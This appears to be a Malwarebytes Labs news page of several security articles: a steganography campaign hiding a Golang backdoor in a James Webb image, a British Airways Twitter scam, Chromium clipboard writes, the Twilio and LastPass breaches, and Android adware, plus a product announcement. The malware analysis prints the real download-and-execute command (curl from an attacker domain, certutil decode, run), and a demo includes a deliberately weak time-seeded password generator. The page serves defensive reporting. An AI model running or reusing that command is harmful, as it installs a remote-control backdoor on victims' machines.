IT NEWS

James Webb telescope images used to hide malware

A rather unique approach to spread malware using the popularity of the James Webb telescope images has been identified by the Securonix threat research team.

The malware is being spread by a phishing campaign that includes a Microsoft Office attachment. Similar to traditional Office macros, the template file contains a Visual Basic script that will initiate the first stage of code execution for this attack once the user enables macros. Through several steps the actual payload turns out to be a Golang binary file that acts as a backdoor.

Golang

Go, often referred to as Golang, is an open source programming language. Some threat actors have started writing malicious code using cross-platform programming languages like Golang, Python, and Rust, with the aim of penetrating and encrypting as many systems as possible. This allows their malware to run on different combinations of operating systems and architectures.

VBA Macro

In this campaign, when the document is opened, a malicious template file is downloaded and saved on the system. The template includes the functions Auto_Open, AutoOpen, and AutoExec. The malicious VBA macro code is set to be auto executed once macros are enabled.

VBA macros should be disabled unless there are compelling reasons not to. As we explained when Microsoft disabled macros for five Office apps, the Mark of the Web (MOTW) can be circumvented by malware authors.

Certificate

The obfuscated code in the macro executes the following command:

cmd.exe /c cd c:\users\{username}\appdata\local & curl http://www.xmlschemeformat.com/update/2021/office/oxb36f8geec634.jpg -o oxb36f8geec634.jpg & certutil -decode oxb36f8geec634.jpg msdllupdate.exe & msdllupdate.exe

This command will download a file named OxB36F8GEEC634.jpg, use certutil.exe to decode it into a binary called msdllupdate.exe and then finally, execute that binary.

But, if you open the .jpg with any of the programs that are normally associated with JPG files, you will see this image:

oxb36f8geec634.jpg

But, remember when we talked about steganography? Images can be used to hide information, or an executable in this case.

Obfuscation

The image contains malicious Base64 code disguised as an included certificate. Base64 is an encoding scheme designed to carry data stored in binary formats across channels that only reliably support text content. Base64 is particularly prevalent on the World Wide Web where one of its uses is the ability to embed image files or other binary assets inside textual assets such as HTML and CSS files.

In the command we saw how the legitimate certutil was used to decode the so-called certificate and create a binary called msdllupdate.exe.
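A defender can triage both halves of this technique: the image that carries a certificate-style Base64 block, and the certutil command line that turns an image into an executable. The following is an added example, not code from the Securonix or Malwarebytes write-ups; the function names, the extension lists and the sample bytes and command line are all constructed for illustration.

```python
import base64
import binascii
import re

JPEG_SOI = b"\xff\xd8\xff"  # JPEG start-of-image marker plus first segment byte
PEM_BLOCK = re.compile(
    rb"-----BEGIN CERTIFICATE-----(.*?)-----END CERTIFICATE-----", re.DOTALL
)
CERTUTIL_DECODE = re.compile(
    r"certutil(?:\.exe)?\s+[-/]decode\s+(\S+)\s+(\S+)", re.IGNORECASE
)
IMAGE_EXT = (".jpg", ".jpeg", ".png", ".gif", ".bmp")  # assumed watch list
EXEC_EXT = (".exe", ".dll", ".scr")                    # assumed watch list


def classify_payload(decoded: bytes) -> str:
    """Label decoded bytes by their leading magic value."""
    if decoded[:2] == b"MZ":      # DOS/PE header: an executable, not a certificate
        return "pe-executable"
    if decoded[:1] == b"\x30":    # ASN.1 SEQUENCE: what a real DER certificate starts with
        return "der-like"
    return "unknown"


def scan_image_for_fake_certificate(data: bytes) -> list:
    """Find PEM-style blocks inside a JPEG and report what they decode to."""
    findings = []
    if not data.startswith(JPEG_SOI):
        return findings
    for match in PEM_BLOCK.finditer(data):
        body = re.sub(rb"\s+", b"", match.group(1))
        try:
            decoded = base64.b64decode(body, validate=True)
        except (binascii.Error, ValueError):
            continue  # not valid Base64, so certutil would not decode it either
        findings.append({
            "offset": match.start(),
            "decoded_size": len(decoded),
            "kind": classify_payload(decoded),
        })
    return findings


def certutil_image_to_exe(cmdline: str):
    """Return (source, target) when certutil decodes an image file into an executable."""
    m = CERTUTIL_DECODE.search(cmdline)
    if not m:
        return None
    src, dst = m.group(1), m.group(2)
    if src.lower().endswith(IMAGE_EXT) and dst.lower().endswith(EXEC_EXT):
        return (src, dst)
    return None


def _pem(raw: bytes) -> bytes:
    """Wrap raw bytes in certificate markers, as the disguised payload does."""
    return (b"-----BEGIN CERTIFICATE-----\n" + base64.encodebytes(raw)
            + b"-----END CERTIFICATE-----\n")


# Constructed samples: a minimal JPEG-looking byte string, not a real image,
# and an inert 64-byte stub that only carries the MZ magic.
FAKE_JPEG_BODY = JPEG_SOI + b"\xe0" + b"\x00" * 32 + b"\xff\xd9"
SAMPLE_MALICIOUS = FAKE_JPEG_BODY + _pem(b"MZ\x90\x00" + b"\x00" * 60)
SAMPLE_REAL_LOOKING = FAKE_JPEG_BODY + _pem(b"\x30\x82\x01\x0a" + b"\x01" * 40)
SAMPLE_PLAIN = FAKE_JPEG_BODY
SAMPLE_CMDLINE = (
    r"cmd.exe /c cd c:\users\alice\appdata\local & "
    "curl http://example.invalid/pic.jpg -o pic.jpg & "
    "certutil -decode pic.jpg update.exe & update.exe"
)

if __name__ == "__main__":
    for name, blob in [("malicious", SAMPLE_MALICIOUS),
                       ("der-like", SAMPLE_REAL_LOOKING),
                       ("plain", SAMPLE_PLAIN)]:
        print(name, scan_image_for_fake_certificate(blob))
    print(certutil_image_to_exe(SAMPLE_CMDLINE))
```
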

Payload

The malware payload copies itself into %localappdata%\microsoft\vault\ and creates and executes a batch file in the same folder called update.bat. The .bat file creates the directory %LOCALAPPDATA%\microsoft\windows\MsSafety and adds another copy of msdllupdate.exe to that folder. For this file, a startup entry is created in the registry to achieve persistence.

The malware connects to a C2 server and goes into an infinite loop waiting for commands from the C2. Three commands are supported:

  • sleep to change timeout between C2 requests
  • timeout to change timeout parameter in nslookup request
  • all other commands will be executed with “cmd.exe /c”

Basically this allows the threat actor to execute arbitrary code on the affected machine.

Mitigation

Malwarebytes customers were protected right from the start since Malwarebytes detected the Msdllupdate.exe file without requiring any updates. Our detection engine identified it as malicious by using our generic criteria for suspicious files.

Malwarebytes blocks Generic.Malware

The Malwarebytes web protection engine will also block traffic to the C2 servers involved in this campaign and the domains hosting malware files.

Stay safe, everyone!

Malwarebytes receives highest rankings in recent third-party tests

Malwarebytes Endpoint Protection continues to receive outstanding results in third-party testing. Our recent participation in two highly-regarded industry evaluations, namely MRG-Effitas and Info-Tech’s Data Quadrant Report, reflects our belief that continual testing and unbiased validation are crucial to our mission to deliver easy, effective, and efficient cyber protection for customers. 

Info-Tech’s Data Quadrant report: Malwarebytes ranks #2 overall and #1 across several key areas

Using data collected from real end users, Info-Tech’s Data Quadrant Reports provide a holistic, unbiased view of the product landscape to help you determine which product is right for your organization. Malwarebytes ranked #2 out of 14 organizations in the report, earning a composite satisfaction score of 8.8.

Malwarebytes also took the #1 spot for three different categories: 

  1. Usability And Intuitiveness (Shallow end user learning curve): 87% user satisfaction 

  2. Vendor Support (Offers quality support): 84% user satisfaction 

  3. Flexible Deployment Options (Supports on-premise, cloud and hybrid IT environments): 87% satisfaction

MRG Effitas 360° Assessment & Certification: Badges across the board

MRG Effitas, a world leader in independent IT research, published its antivirus efficacy assessment results in August 2022. We achieved the highest possible score (100%) for a fourth consecutive quarter and received certifications for Level 1 (the highest ranking awarded by MRG Effitas), Exploit, Online Banking, and Ransomware.

Tested and published in a separate report, our mobile product also achieved the MRG Android 360 degree certification. 

Malwarebytes Endpoint Protection blocked a wide range of ransomware, fileless attacks and other threats:

  • 100 percent of “in the wild” threats blocked: Tested malware considered as ‘zero-day’, delivered by URLs 

  • 100 percent of ransomware blocked: Tested ‘in-house’ ransomware samples (no possibly known signatures or community verdicts)

  • 100 percent of financial malware blocked: Tested financial malware used in the Magecart credit card-skimming attack

  • 100 percent of fileless attacks blocked: Tested to see how security products protect against a specific exploitation technique

  • 100 percent of PUA/adware blocked: Tested potentially unwanted applications (PUA), that are not malicious, but are generally considered unsuitable for most home or business networks.

Malwarebytes Endpoint Protection also delivered the fourth best performance rating of all tested vendors, and did it with zero false positives, providing further evidence that the Malwarebytes EP delivers the right combination of powerful detection without affecting overall operating system performance.

Easy, effective, and efficient cyber protection validated by third-party testing

Malwarebytes is committed to regularly subjecting our solutions to third-party testing.

Third-party testing is critical to ensuring that your endpoint security solution performs well where it counts, whether that’s ease-of-use, rate of false positives, percentage of threats blocked, and so on. To read more about what customers have to say about Malwarebytes Endpoint Protection and EDR, check out our case studies page.

More resources

Why MRG-Effitas matters to SMBs

MITRE ATT&CK® Evaluation results: Malwarebytes’ efficiency, delivered simply, earns high marks

Why MITRE matters to SMBs

British Airways customers targeted in lost luggage Twitter scam

Getting back into the travel habit? Jumping on a plane soon? Experienced a bit of a luggage disaster and looking for help on social media? Watch out, because a lack of prior research could prove very costly.

Word has spread of a bogus Twitter account pretending to be a customer support channel of British Airways. Now suspended, the fraud operation seems to have taken a fair bit of cash before being shut down. 

Lose your luggage, find a fraud

People posting about missing luggage on Twitter quickly found their replies filling up with offers to help from a non-verified account purporting to be British Airways. The account asked for phone numbers and likely pushed for additional contact via Twitter’s private message system.

Unfortunately, these offers of help quickly turned sour. The scam account requested various forms of payment to help recover the missing luggage. Although the fakers have been suspended, a lot of replies sent their way still exist. Looking through, we can see at least one individual who was initially told that her luggage was “lost in Dallas”. To move things along, a request for payment was made using the payment system Wise.

Though initially a small amount overall, the scammers quickly ramped things up. It’s not long before the victim complained that they were being asked for even more money. Eventually, they claim to have lost out on no less than a thousand US dollars. Of course, they still don’t have any idea where their luggage has ended up. Taking these amounts from people who are overseas, with no belongings, and a now potentially cleaned out bank account is quite the vicious approach.

Avoiding the luggage assistance fakers

Here are some things you should do, and be aware of, when in transit.

  • Airlines are not going to ask for additional fees or payment to help you look for your bags.
  • Be wary of non-verified accounts replying to you. Is it asking for additional personal details? Phone numbers? Payment? Why?
  • Go directly to the source. Use official websites, verified support channels, phone numbers listed on those official websites. You can pretend to be anyone you like on social media, and this is a ripe field for potentially costly scams.
  • If you’re still not sure of the authenticity of an account you’re dealing with, go to the airport help desk. If you’ve realised your bags are missing, you’re almost certainly still in the terminal. Make full use of their availability and ensure everything and everyone you’re interacting with is the real deal.

As people slowly start to get back into the swing of travel, it’s inevitable that fraudsters will do as much as they can to rip those travellers off in any way they can. Customer support is great, but it pays to be mindful when ringing the help alarm. You never quite know who’s going to show up in response.

Chromium browsers can write to the system clipboard without your permission

If you are a user of Google Chrome or any other Chromium-based web browser, then websites may push anything they want to the operating system’s clipboard without your permission or any user interaction. This means that by simply visiting a website, the data on your clipboard may be overwritten without your consent or knowledge.

Clipboard

In layman’s terms, the clipboard is where the data lives while you copy and paste, or cut and paste for that matter. Copying and pasting is such an essential part of our daily computing that most of us just do it automatically. And it can lead to undesirable results if something outside of our control decides to interfere. For example, if you used the “cut” action on a certain piece of text with the intention to paste it somewhere else, it can be a nasty surprise if something completely different gets pasted, and due to using the cut rather than copy, you may have lost the original.

Gestures

Firefox and Safari do require a user gesture before websites can copy content to the device’s clipboard. User gesture in this context means that the user is selecting content on the site and using Ctrl+C or other means to copy it to the clipboard. Chrome and other Chromium-based browsers currently have no such restriction.

Demonstration

If you’d like to see this demonstrated or if you want to check if you are somehow protected against this happening, you can visit the Webplatform News website to test your browser. All it takes is to visit the site and check the content of the clipboard afterwards. You can check the content by “pasting” to an empty text editor like Notepad. Should you get the following message in your clipboard, the browser is vulnerable to unauthorized clipboard manipulation:

“Hello, this message is in your clipboard because you visited the website Web Platform News in a browser that allows websites to write to the clipboard without the user’s permission. Sorry for the inconvenience. For more information about this issue, see https://github.com/w3c/clipboard-apis/issues/182.”

Windows clipboard manager

For Windows 10 and 11 users there is a way to retrieve overwritten items from your clipboard. These Windows versions come with a clipboard manager, although it does need to be turned on first. This can be done in the Settings menu on your computer. Under System, you’ll find a section called Clipboard. Toggle the switch to On behind Clipboard history. Windows will now start keeping track of your clipboard content. To review the history up to 25 items you can use the Win+V keys.

Not new

At Malwarebytes Labs we wrote about clipboard poisoning attacks on the Mac back in 2016. The take-away from that article in the current context is that by pasting in a sensitive place, like the Terminal on a Mac, or a Command Prompt on a Windows machine, text can become a command that gets executed.

Broken

In his article about the clipboard issue, developer Jeff Johnson states that the user gesture requirement for writing to the clipboard was accidentally broken in version 104. And although the vulnerability has been flagged, fixing it may be delayed because it breaks other functionality. Apparently, adding user gesture requirement for readText and writeText APIs breaks NTP doodle sharing. NTP Google doodles are animations that appear in some cases in Chrome when a new tab is opened. Personally, I wouldn’t miss them at all.

Mitigation

While we wait for a fix, threat actors may come up with ways to abuse this temporary vulnerability. Here are some things you can do to stay on the safe side:

  • Do not open webpages between any cut/copy and paste actions.
  • Check the content of your clipboard before you paste into any sensitive areas. You can use any clipboard manager or just paste into a text field to see what is momentarily there. For those of you doing financial transactions this is always worth considering, since there is malware out there that can change bitcoin addresses and bank account numbers on your clipboard.

Stay safe, everyone!

A week in security (August 22 – August 28)

Last week on Malwarebytes Labs:

Stay safe!

Twilio data breach turns out to be more elaborate than suspected

Earlier this month, messaging service Twilio got compromised by a sophisticated social engineering attack. After deploying phishing attacks against company employees, hackers were able to access user data, but now it seems that the impact of the hack was more elaborate than originally assumed.

In a first update, Twilio, a cloud-based communication platform provider, revealed that the attackers also compromised the accounts of some users of Authy, its two-factor authentication (2FA) app. Outside of Twilio, the identity authentication company Okta revealed that the data of some Okta customers was accessible to a threat actor, as well. And Signal tweeted that they, too, had been affected by the Twilio breach.

Authy

Authy is a two-factor authentication (2FA) service from Twilio that allows users to secure their online accounts by double-checking the login attempt via a dedicated app, after typing in the login credentials.

By gaining access to 2FA data, the malicious actors gained access to the accounts of 93 individual Authy users and registered additional devices to their accounts. Twilio says that it has now removed such devices from accounts.

Okta

Okta has determined that a small number of mobile phone numbers and associated SMS messages containing one-time passwords (OTPs) were accessible to the threat actor via the Twilio console. A one-time password is an automatically generated numeric or alphanumeric string of characters that authenticates a user for a single transaction or login session. OTPs typically expire after a short period (up to one minute).

Okta offers customers a range of authenticators to choose from, including the use of SMS for the delivery of one-time codes. Twilio provides one of two services Okta leverages for customers that choose to use SMS as an authentication factor.

Signal

Signal is an end-to-end encrypted messaging service, similar to WhatsApp or iMessage, but owned and operated by a non-profit foundation. Twilio provides Signal with phone number verification services. As a result of the attack on Twilio, Signal warned that for 1,900 users, an attacker could have attempted to re-register their number to another device or learned that their number was registered to Signal. These 1,900 users were notified directly, and prompted to re-register.

Signal’s tweet about the Twilio breach

Scatter Swine

The Twilio data breach appears to be part of a larger campaign from hackers that targeted at least 130 organizations, among them MailChimp, Klaviyo, and Cloudflare.

In this campaign, spanning recent months, a number of technology companies were subject to persistent phishing attacks by a threat actor that you will see referred to as Scatter Swine or Oktapus. This threat actor is known to repeatedly target the same organizations with multiple phishing attacks within a matter of hours.

In the Twilio case, the threat actor searched for 38 unique phone numbers in the Twilio console, nearly all of which can be linked to a single targeted organization. A review of logs provided by Twilio revealed that the threat actor was seeking to expand their access. It is likely that the threat actor used credentials previously stolen in phishing campaigns to trigger SMS-based MFA challenges, and used access to Twilio systems to search for OTPs sent in those challenges.

Mitigation

If you are a user of any of the services mentioned above, you should have been notified if your account was affected, but it doesn’t hurt to check the advice and details about the attack on their respective sites.

One general piece of advice is to be extra vigilant about “new device added” notifications from any provider. This could be a warning signal that a threat actor is trying to intercept 2FA messages or OTPs that are intended for you.

Playing Doom on a John Deere tractor with Sick Codes: Lock and Code S03E18

In 1993, the video game developers at id Software released Doom, a first-person shooter that placed a nameless protagonist into the fiery depths of hell, equipped with an arsenal of weapons to mow down imps, demons, lost souls, and the intimidating “Barons of Hell.” 

In 2022, the hacker Sick Codes installed a modified version of Doom on the smart control panel of a John Deere tractor, with the video game’s nameless protagonist this time mowing down something entirely more apt for the situation: Corn.

At DEFCON 30, Sick Codes presented his work to an audience of onlookers at the conference’s main stage. His efforts to run the modified version of Doom, which are discussed in today’s episode of Lock and Code with host David Ruiz, are not just good for a laugh, though. For one specific community, the work represents a possible, important step forward in their own fight—the fight for the “right to repair.” 

“Right to Repair” enthusiasts want to be able to easily repair the things they own. It sounds like a simple ask, but when’s the last time you repaired your own iPhone? When’s the last time you were even able to replace the battery yourself on your smartphone?

The right to repair your equipment, without intervention from an authorized dealer, is hugely important to some farmers. If their tractor breaks down because of a software issue, they don’t want to wait around for someone to have to physically visit their site to fix it. They want to be able to fix it then and there and get on with their work.

So, when a hacker shows off that he was able to do something that wasn’t thought possible on a device that can be notoriously difficult to self-repair, it garners attention.  

Today, we speak with Sick Codes about his most recent work on a John Deere tractor, and how his work represents a follow-up to what he and a group of researchers showed last year, when he revealed how he was able to glean an enormous amount of information about John Deere smart tractor owners from John Deere’s data operations center. This time around, as Sick Codes explained, the work was less about tinkering around on a laptop and more about getting physical with a few control panels that he found online.

“It’s kind of like surgery but for metallic objects, if that makes sense. Non-organic material.”

Tune in today to listen to Sick Codes discuss his work, why he did what he did, and how John Deere has reacted to his research. 

You can also find us on Apple Podcasts, Spotify, and Google Podcasts, plus whatever preferred podcast platform you use.

Show notes and credits:

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 4.0 License
http://creativecommons.org/licenses/by/4.0/
Outro Music: “Good God” by Wowa (unminus.com)

Source code of password manager LastPass stolen by attacker

In a security incident notice, LastPass informed the public that an unauthorized party gained access to portions of the LastPass development environment through a single compromised developer account. There is no evidence that this incident involved any access to customer data or encrypted password vaults.

LastPass

LastPass offers a password manager which is reportedly used by more than 33 million people and 100,000 businesses around the world. A password manager is a software application designed to store and manage online credentials. It also generates strong passwords. Usually, these passwords are stored in an encrypted database and locked behind a master password.

Stolen passwords

Because of the nature of their business, a breach notification naturally worries people that the passwords they stored in their password manager may have been leaked or compromised. And indeed there was some speculation on social media that hackers may be able to access the keys to password vaults after stealing source code and proprietary information.

Since your individual passwords are encrypted and locked behind a master password that even LastPass does not know, this worry seems unjustified. In December of 2021, LastPass users reported that their master passwords were compromised after receiving email warnings that someone tried to use them to log into their accounts from unknown locations and devices. LastPass determined that these were the result of a credential stuffing attack. Credential stuffing is a special type of brute force attack where the attacker uses existing username and password combinations, usually ones that were stolen in a data breach on another service.

Random generated passwords

Depending on the source code that was stolen there could be reason to worry about random generated passwords. Since computer systems are unable to come up with truly random numbers, having access to the source code might make it possible to predict the “random” generated passwords.

While that may seem far-fetched, a determined attacker with enough background knowledge about the circumstances under which the password was generated (for example the length of the password, date of creation, username and/or email address, which elements are allowed and required, etc.) might be able to brute force the password with far fewer guesses, if they know how the randomization part of the password creation is coded in the software.
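The difference between a predictable and an unpredictable generator can be measured. The following is an added example built around a hypothetical generator; it is not LastPass code, and nothing on this page says LastPass generates passwords this way. It assumes a generator seeded with the creation time in seconds and compares it with one drawing from the operating system's CSPRNG; the timestamps are constructed.

```python
import math
import random
import secrets
import string

ALPHABET = string.ascii_letters + string.digits  # 62 symbols


def weak_generate(created_epoch: int, length: int = 16) -> str:
    """Hypothetical flawed design: a general-purpose PRNG seeded with the creation time."""
    rng = random.Random(created_epoch)
    return "".join(rng.choice(ALPHABET) for _ in range(length))


def strong_generate(length: int = 16) -> str:
    """Hardened form: every character comes from the OS CSPRNG, there is no seed to guess."""
    return "".join(secrets.choice(ALPHABET) for _ in range(length))


def find_seed(password: str, window_start: int, window_end: int):
    """Audit helper: does any seed in the time window reproduce this password?"""
    for seed in range(window_start, window_end):
        if weak_generate(seed, len(password)) == password:
            return seed
    return None


def guess_bits_weak(window_seconds: int) -> float:
    """Search space in bits when only the creation window is unknown."""
    return math.log2(window_seconds)


def guess_bits_strong(length: int) -> float:
    """Search space in bits when each character is independent and uniform."""
    return length * math.log2(len(ALPHABET))


# Constructed scenario: the creation time is known to within one hour.
WINDOW_START = 1661472000
WINDOW_END = WINDOW_START + 3600
CREATED_AT = WINDOW_START + 1234

if __name__ == "__main__":
    weak_pw = weak_generate(CREATED_AT)
    strong_pw = strong_generate()
    print("weak generator reproduced from seed:",
          find_seed(weak_pw, WINDOW_START, WINDOW_END))
    print("strong generator reproduced from seed:",
          find_seed(strong_pw, WINDOW_START, WINDOW_END))
    print("bits to search, weak:   %.1f" % guess_bits_weak(3600))
    print("bits to search, strong: %.1f" % guess_bits_strong(16))
```
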

What to do?

In response to the incident, LastPass deployed containment and mitigation measures, and engaged a leading cybersecurity and forensics firm. While the investigation is ongoing, they have achieved a state of containment, implemented additional enhanced security measures, and see no further evidence of unauthorized activity. 

If you haven’t done so already it is advisable to enable multi-factor authentication (MFA) on your LastPass accounts so that threat actors won’t be able to access your account even if your password is compromised. The instructions to enable MFA can be found on the LastPass Support pages.

We will keep you posted here if there are any updates to the story.

Adware found on Google Play — PDF Reader serving up full screen ads

A PDF reader found on Google Play with over one million downloads is aggressively displaying full screen ads, even when the app is not in use. More specifically, the reader is known as PDF reader – documents viewer, package name com.document.pdf.viewer. As a result, this aggressive behavior lands it in the realm of adware. Or as we call it, Android/Adware.HiddenAds.PPMA.

Catching the adware

Catching this adware in real time is a game of install and wait. It takes a couple of hours before the PDF app will display ads. This long delay is in order to make it harder to track down which app is causing the ads. For example, full screen ads displaying immediately after install would likely result in a quick uninstall. With this in mind, I plugged my test phone into my laptop with Android Device Monitor running. Among other tools, Android Device Monitor includes LogCat which logs all activity on an Android mobile device. I then installed PDF reader – documents viewer, package name com.document.pdf.viewer, directly from Google Play. Thus, my waiting game begins the morning of August 22nd.

To my surprise, at 15:04 I heard my test phone sound a chime. My expectation from previous testing is that it takes longer before an ad displays. Before unlocking the screen, I checked my LogCat logs.

08-22 15:04:55.348: I/ActivityManager(765): START u0 {flg=0x14c00004 cmp=com.document.pdf.viewer/.ads.PPMActivity} from uid 10277

The keyword is ‘START’ in the log. What starts is an Ad SDK. This time, from the PDF reader’s special in-house Ad SDK, com.document.pdf.viewer.ads.PPMActivity.  Unlocking the lock screen, another important log comes in.

08-22 15:04:56.318: I/ActivityManager(765): Displayed com.document.pdf.viewer/.ads.PPMActivity: +942ms

Indeed, looking at the phone there is a full screen ad “displayed.”

Soon after, another Ad SDK starts in the logs.

08-22 15:05:34.227: I/ActivityManager(765): START u0 {flg=0x10000000 cmp=com.document.pdf.viewer/com.facebook.ads.AudienceNetworkActivity (has extras)} from uid 10277

Once again, another ad displays. This time it is a video ad.

08-22 15:05:34.927: I/ActivityManager(765): Displayed com.document.pdf.viewer/com.facebook.ads.AudienceNetworkActivity: +555ms

After the initial ads, they come more frequently. Each time, the start of ads is signified by a chime sounding on the mobile device. Henceforth, a full screen ad is waiting. Immediately after the first ad is a video ad.
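The same triage can be run over a saved LogCat capture instead of watching it live. The following is an added example, not tooling from the original analysis: it pairs each ActivityManager START line for an ad activity with its Displayed line and attributes it to the owning package. The first four log lines are the ones quoted above, the last is constructed, and the ad-class markers are an assumed heuristic.

```python
import re

TS = r"(?P<ts>\d\d-\d\d \d\d:\d\d:\d\d\.\d{3})"
START_RE = re.compile(
    TS + r": I/ActivityManager\(\s*\d+\): START u\d+ \{.*?cmp=(?P<cmp>[^\s}]+).*?\}"
    r"(?: from uid (?P<uid>\d+))?"
)
DISPLAYED_RE = re.compile(
    TS + r": I/ActivityManager\(\s*\d+\): Displayed (?P<cmp>[^\s:]+): "
    r"\+(?:(?P<s>\d+)s)?(?P<ms>\d+)ms"
)
# Assumed heuristic: substrings of activity class names that indicate an ad SDK.
AD_MARKERS = (".ads.", "applovin")


def split_component(cmp: str):
    """Expand 'pkg/.Class' or 'pkg/full.Class' into (package, full class name)."""
    pkg, cls = cmp.split("/", 1)
    if cls.startswith("."):
        cls = pkg + cls  # a leading dot means the class is relative to the package
    return pkg, cls


def is_ad_activity(cls: str) -> bool:
    lowered = cls.lower()
    return any(marker in lowered for marker in AD_MARKERS)


def ad_activity_launches(lines):
    """Return one record per ad activity START, with its display latency if seen."""
    launches = []
    pending = {}  # component string -> index of the launch awaiting 'Displayed'
    for line in lines:
        line = line.strip()
        m = START_RE.match(line)
        if m:
            pkg, cls = split_component(m["cmp"])
            if is_ad_activity(cls):
                launches.append({
                    "started": m["ts"],
                    "package": pkg,
                    "activity": cls,
                    "caller_uid": int(m["uid"]) if m["uid"] else None,
                    "displayed_ms": None,
                })
                pending[m["cmp"]] = len(launches) - 1
            continue
        m = DISPLAYED_RE.match(line)
        if m and m["cmp"] in pending:
            idx = pending.pop(m["cmp"])
            launches[idx]["displayed_ms"] = int(m["s"] or 0) * 1000 + int(m["ms"])
    return launches


def packages_showing_ads(launches):
    """Count displayed ad activities per package, the figure that points at the culprit."""
    counts = {}
    for launch in launches:
        if launch["displayed_ms"] is not None:
            counts[launch["package"]] = counts.get(launch["package"], 0) + 1
    return counts


SAMPLE_LOG = """\
08-22 15:04:55.348: I/ActivityManager(765): START u0 {flg=0x14c00004 cmp=com.document.pdf.viewer/.ads.PPMActivity} from uid 10277
08-22 15:04:56.318: I/ActivityManager(765): Displayed com.document.pdf.viewer/.ads.PPMActivity: +942ms
08-22 15:05:34.227: I/ActivityManager(765): START u0 {flg=0x10000000 cmp=com.document.pdf.viewer/com.facebook.ads.AudienceNetworkActivity (has extras)} from uid 10277
08-22 15:05:34.927: I/ActivityManager(765): Displayed com.document.pdf.viewer/com.facebook.ads.AudienceNetworkActivity: +555ms
08-22 15:06:10.101: I/ActivityManager(765): START u0 {act=android.intent.action.MAIN flg=0x10200000 cmp=com.example.notes/.MainActivity} from uid 10041
""".splitlines()  # final line is constructed: an ordinary, non-ad launch

if __name__ == "__main__":
    found = ad_activity_launches(SAMPLE_LOG)
    for launch in found:
        print(launch)
    print(packages_showing_ads(found))
```
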

Don’t blame the Ad SDKs

PDF reader uses an array of common Ad SDKs and its own Ad SDK. Facebook Ads is shown in the log above, but we also observed it using Applovin along with others. In addition, it uses an in-house Ad SDK contained in com.document.pdf.viewer.ads.PPMActivity. Although the use of these common Ad SDKs is shown displaying ads, it is not necessarily their fault. The issue is displaying ads where they ought not to be displayed. Any of these ads within the app, while using the app, is fair game. Moreover, Ad SDKs like Applovin and Facebook Ads are necessary to keep apps free on the Play Store. It is only when the ads start displaying outside the app at random that this qualifies as adware. It is the PDF reader app that is wrongfully using these Ad SDKs.

Not all PDF readers are the same

There are many good PDF readers on Google Play. However, this one has some oddities signaling red flags right from the Google Play Store description.

Note the Mature 17+ content rating. For what reason does a PDF reader need a mature rating? Another clue something is not right is the developer’s name of Fairy games. I get diversifying the kinds of apps you provide, but it is an odd developer name for anything other than gaming apps.

Am I infected?

If you are thinking to yourself, “I have a PDF reader installed, am I infected!?” here are a few things to check. Are you receiving full screen ads? If yes, do you have an icon that looks like this?

If you do, you can uninstall from Apps info.

More easily, you can install Malwarebytes for Android and use our free scanner to remove.

Another one slips through

From what we can tell from previous versions of PDF reader – documents viewer, it has existed since November 2021. Each version thereafter serves ads just like the most recent Google Play version. Although we cannot verify if it existed on Google Play since 2021, it is likely the case. If you have a lot of apps installed on your mobile device, this one can be very hard to track down. This is another reason not to blindly trust that you are safe while installing exclusively from Google Play. Even if the Play Store is by far the safest place to install apps on Android, it can fail from time to time as well. Having an anti-malware scanner, or anti-adware in this case, is a good idea. Stay safe out there!

App Information

Package name: com.document.pdf.viewer

App Name: PDF reader – documents viewer

Developer: Fairy games

MD5: CDA77D85D5B733C89F53254F11F3F372

Google Play URL: https://play.google.com/store/apps/details?id=com.document.pdf.viewer

Introducing Patch Management for OneView

We’re thrilled to announce our Patch Management module for OneView, which is paired alongside our Vulnerability Assessment module to help you uncover vulnerabilities, respond to threats, and keep your customers productive and safe.

Vulnerability identification and system patching are critical to strengthening security postures, but they can become a monumental task that many organizations aren’t equipped to tackle. Despite the known risks of malware and ransomware infections, the average time to patch is 102 days and almost 75% of small and large businesses say they lack the resources to patch vulnerabilities quickly enough.

As an MSP, it is important you have tools to streamline an effective, intuitive approach to vulnerability visibility and patch management for your customers. Check out our blog post “6 reasons MSPs need a patch management platform” for more benefits of a VPM platform for MSPs.

Malwarebytes Vulnerability Assessment and Patch Management modules extend OneView functionality to provide your organization deep visibility into the security vulnerabilities in your customers’ digital ecosystems. In this post, we give you a walkthrough of how to use Patch Management for OneView. For our previous post on using Vulnerability Assessment for OneView, click here.

Using the Patch Management module 

Click on “Patch Management”.

Here you can find more information on the updates available for your site’s endpoints and install these updates. Choose between tabs for operating system patches and third-party software application updates.

Click on a particular patch to learn more.

Below you will see a list of all endpoints with this vulnerability. Select the endpoints and click “Apply patches”.

Check the status of these updates on the “Tasks” page.

Quickly uncover and respond to vulnerabilities with VPM for OneView

Vulnerability and Patch Management will scan for updates across your endpoints and hand you the keys so you can lock the doors quickly and easily. To recap, this module provides the following features:

  • Scan for vulnerabilities across installed endpoint software.
  • Patch outdated applications, operating systems, or software vulnerabilities across your endpoints.
  • View detailed information on vulnerabilities across sites and endpoints.
  • View detailed information on available software and OS patches across sites and endpoints.
  • View recommended updates to perform on detected vulnerabilities.
  • Send automatic email notifications to administrators on detected vulnerabilities, available patches, and installed patches.
  • View summarized vulnerability and patching information across endpoints from your OneView dashboard.

If you have any questions, please visit service.malwarebytes.com.

Check out our MSP’s Guide to selling security!